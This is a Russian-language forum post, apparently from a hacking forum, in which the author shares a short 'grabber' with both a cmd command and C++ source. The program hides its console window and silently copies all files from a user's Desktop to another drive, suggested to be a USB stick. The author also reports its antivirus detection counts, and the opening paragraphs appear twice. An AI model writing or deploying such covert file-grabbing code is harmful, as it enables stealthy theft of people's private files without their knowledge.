MaminBandit
Участник
Так, сразу скажу, что скорее всего эта статья никому не пригодится и вообще зря я выложил 10 строчный код на с++.
Решил я серьёзно разобраться в Windows CMD, Shell и т.д. И смысл моего недограббера заключается в том, что он копирует все файлы с рабочего стола на ваш диск(скопируются все ярлыки, txt и куча всякой фигни, если зайдёт - можно продолжить тему и копировать только нужное)
С помощью команды xcopy можно копировать файлы, а с помощью *.* можно скопировать ВСЕ файлы из папки, именно этим мы и пользуемся.
Чтобы скопировать файлы через CMD нужно прописать
Мы же сделаем из этого exe + скроем cmd
Чтобы изменить Диск, на который будут копироваться файлы (а скорее всего вы будете использовать флешку) нужно поменять букву "D:" .
И в конце получается такой exe
Каким то боком сейчас VT выдаёт 5 детектов, хотя когда я тестил на другом файлe пару минут назад, было 2, вообщем сами увидите всё.
Решил я серьёзно разобраться в Windows CMD, Shell и т.д. И смысл моего недограббера заключается в том, что он копирует все файлы с рабочего стола на ваш диск(скопируются все ярлыки, txt и куча всякой фигни, если зайдёт - можно продолжить тему и копировать только нужное)
С помощью команды xcopy можно копировать файлы, а с помощью *.* можно скопировать ВСЕ файлы из папки, именно этим мы и пользуемся.
Чтобы скопировать файлы через CMD нужно прописать
Код:
xcopy C:\Users\%Username%\Desktop\*.* D:\GrabDesktop\ /E /S
C++:
#include <windows.h>
#include <shellapi.h>
#include <iostream>
int main()
{
HWND hWnd = GetConsoleWindow();
ShowWindow(hWnd, SW_HIDE);
system("xcopy C:\\Users\\%Username%\\Desktop\\*.* D:\\GrabDesktop\\ /E /S");
}
И в конце получается такой exe
Каким то боком сейчас VT выдаёт 5 детектов, хотя когда я тестил на другом файлe пару минут назад, было 2, вообщем сами увидите всё.